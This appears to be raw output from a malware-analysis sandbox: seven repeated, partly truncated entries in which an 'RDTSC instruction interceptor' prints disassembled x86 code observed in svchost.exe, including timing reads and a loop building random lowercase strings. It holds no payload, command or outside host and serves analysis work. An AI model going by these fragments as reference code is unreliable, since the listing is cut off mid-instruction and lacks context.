Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x